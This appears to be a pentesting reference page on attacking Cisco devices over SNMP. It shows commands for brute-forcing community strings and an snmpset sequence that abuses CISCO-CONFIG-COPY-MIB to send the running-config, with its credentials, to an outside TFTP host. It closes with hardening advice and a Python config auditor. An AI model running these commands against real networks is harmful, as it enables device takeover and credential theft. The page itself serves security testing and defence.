Cisco SNMP


tip

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Pentesting Cisco Networks

SNMP functions over UDP with ports 161/UDP for general messages and 162/UDP for trap messages. This protocol relies on community strings, serving as plaintext "passwords" that enable communication between SNMP agents and managers. These strings determine the access level, specifically read-only (RO) or read-write (RW) permissions.

A classic—yet still extremely effective—attack vector is to brute-force community strings in order to elevate from unauthenticated user to device administrator (RW community).
A practical tool for this task is onesixtyone:

```bash
onesixtyone -c community_strings.txt -i targets.txt
```

Other fast options are the Nmap NSE script snmp-brute or Hydra's SNMP module:

```bash
nmap -sU -p161 --script snmp-brute --script-args brute.community=wordlist 10.0.0.0/24
hydra -P wordlist.txt -s 161 10.10.10.1 snmp
```

Dumping configuration through SNMP (CISCO-CONFIG-COPY-MIB)

If you obtain an RW community you can copy the running-config/startup-config to a TFTP/FTP server without CLI access by abusing the CISCO-CONFIG-COPY-MIB (1.3.6.1.4.1.9.9.96). Two common approaches are:

  1. Nmap NSE – snmp-ios-config

```bash
nmap -sU -p161 --script snmp-ios-config \
     --script-args creds.snmp=private 192.168.66.1
```

The script automatically orchestrates the copy operation and prints the configuration to stdout.

  2. Manual snmpset sequence

```bash
# Copy running-config (4) to a TFTP server (1) – random row id 1234
# Each OID is a column of ccCopyEntry (CISCO-CONFIG-COPY-MIB) indexed by row 1234:
#   .2  ccCopyProtocol       = 1  (tftp)
#   .3  ccCopySourceFileType = 4  (runningConfig)
#   .4  ccCopyDestFileType   = 1  (networkFile)
#   .5  ccCopyServerAddress  = TFTP server IP
#   .6  ccCopyFileName       = file name written on the TFTP server
#   .14 ccCopyEntryRowStatus = 4  (createAndGo)
snmpset -v2c -c private 192.168.66.1 \
  1.3.6.1.4.1.9.9.96.1.1.1.1.2.1234 i 1 \
  1.3.6.1.4.1.9.9.96.1.1.1.1.3.1234 i 4 \
  1.3.6.1.4.1.9.9.96.1.1.1.1.4.1234 i 1 \
  1.3.6.1.4.1.9.9.96.1.1.1.1.5.1234 a 10.10.14.8 \
  1.3.6.1.4.1.9.9.96.1.1.1.1.6.1234 s "backup.cfg" \
  1.3.6.1.4.1.9.9.96.1.1.1.1.14.1234 i 4
```

Row identifiers are one-shot; reuse within five minutes triggers inconsistentValue errors.

Once the file is on your TFTP server you can inspect credentials (enable secret, username <user> secret, etc.) or even push a modified config back to the device.


Metasploit goodies

  • cisco_config_tftp – downloads running-config/startup-config via TFTP after abusing the same MIB.
  • snmp_enum – collects device inventory information, VLANs, interface descriptions, ARP tables, etc.
```bash
use auxiliary/scanner/snmp/snmp_enum
set RHOSTS 10.10.100.10
set COMMUNITY public
run
```

Recent Cisco SNMP vulnerabilities (2023 – 2025)

Keeping track of vendor advisories is useful to scope zero-day-to-n-day opportunities inside an engagement:

| Year | CVE | Affected feature | Impact |
|------|-----|------------------|--------|
| 2025 | CVE-2025-20174 | SNMP subsystem | Crafted packet leads to authenticated DoS (reload) on IOS/IOS-XE (v1/v2c/v3). |
| 2024 | CVE-2024-20373 | IPv4 ACL handling | Mis-configured extended ACLs silently fail, allowing unauthenticated SNMP polling when a valid community/user is known. |
| 2025 | (no CVE yet) | SNMPv3 configuration restriction bypass | Valid v3 user can poll from addresses that should be denied. |

Exploitability often still depends on possessing the community string or v3 credentials—another reason why brute-forcing them remains relevant.


Hardening & Detection tips

  • Upgrade to a fixed IOS/IOS-XE version (see Cisco advisory for the CVE above).
  • Prefer SNMPv3 with authPriv (SHA-256/AES-256) over v1/v2c.
    snmp-server group SECURE v3 priv
    snmp-server user monitor SECURE v3 auth sha <authpass> priv aes 256 <privpass>
    
  • Bind SNMP to a management VRF and restrict with standard numbered IPv4 ACLs (extended named ACLs are risky – CVE-2024-20373).
  • Disable RW communities; if operationally required, limit them with ACL and views:
    snmp-server community <string> RW 99 view SysView
  • Monitor for:
    • UDP/161 spikes or unexpected sources (SIEM rules).
    • CISCO-CONFIG-MAN-MIB::ccmHistoryEventConfigSource events indicating out-of-band config changes.
  • Enable SNMPv3 logging and snmp-server packetsize 1500 to reduce certain DoS vectors.
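As an added defensive check (not part of the original page or any Cisco tool), the script below audits the snmp-server lines of an IOS running-config for the weaknesses listed above: well-known community strings, RW and RO communities without an ACL or view, and SNMPv3 groups or users configured without priv. The embedded config is constructed sample input; the parser accepts the view/RO/RW/ACL keywords in either order.

```python
# Constructed IOS running-config excerpt (sample input, not taken from a real device).
SAMPLE_CONFIG = """\
snmp-server community public RO
snmp-server community private RW
snmp-server community M0n1tor RO 10
snmp-server community Backup0ps RW 99 view SysView
snmp-server group WEAKGRP v3 auth
snmp-server group SECURE v3 priv
snmp-server user monitor SECURE v3 auth sha <authpass> priv aes 256 <privpass>
snmp-server user legacy WEAKGRP v3 auth md5 <authpass>
"""
WELL_KNOWN = {"public", "private", "cisco", "admin", "manager"}  # in every wordlist

def parse_community(tokens):
    # 'snmp-server community <str> [view V] [RO|RW] [acl]', keywords in either order
    name, mode, view, acl, rest = tokens[2], "RO", None, None, tokens[3:]
    i = 0
    while i < len(rest):
        if rest[i] in ("RO", "RW"):
            mode = rest[i]
        elif rest[i] == "view" and i + 1 < len(rest):
            view, i = rest[i + 1], i + 1
        else:
            acl = rest[i]                      # numbered or named IPv4 ACL
        i += 1
    return name, mode, view, acl

def audit_snmp_config(config):
    """Return (severity, finding) tuples for the SNMP weaknesses discussed on this page."""
    findings = []
    for line in config.splitlines():
        t = line.split()
        if t[:2] == ["snmp-server", "community"]:
            name, mode, view, acl = parse_community(t)
            if name.lower() in WELL_KNOWN:
                findings.append(("high", f"community '{name}' is a well-known default string"))
            if mode == "RW" and (acl is None or view is None):
                findings.append(("high", f"RW community '{name}' lacks ACL and/or view restriction"))
            elif mode == "RW":
                findings.append(("low", f"RW community '{name}' in use; disable unless required"))
            elif acl is None:
                findings.append(("medium", f"RO community '{name}' has no ACL"))
        elif t[:2] == ["snmp-server", "group"] and "v3" in t:
            level = (t[t.index("v3") + 1:] or ["?"])[0]   # noauth | auth | priv
            if level != "priv":
                findings.append(("medium", f"v3 group '{t[2]}' uses level '{level}', not 'priv'"))
        elif t[:2] == ["snmp-server", "user"] and "v3" in t and "priv" not in t:
            findings.append(("medium", f"v3 user '{t[2]}' has no priv keyword (no encryption)"))
    return findings
```

Running `audit_snmp_config(SAMPLE_CONFIG)` flags public/private, the unrestricted RW community, the auth-only group and the user without priv, and stays silent on the ACL-bound RO community and the authPriv user.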

References

  • Cisco: How To Copy Configurations To and From Cisco Devices Using SNMP
  • Cisco Security Advisory cisco-sa-snmp-uwBXfqww (CVE-2024-20373)
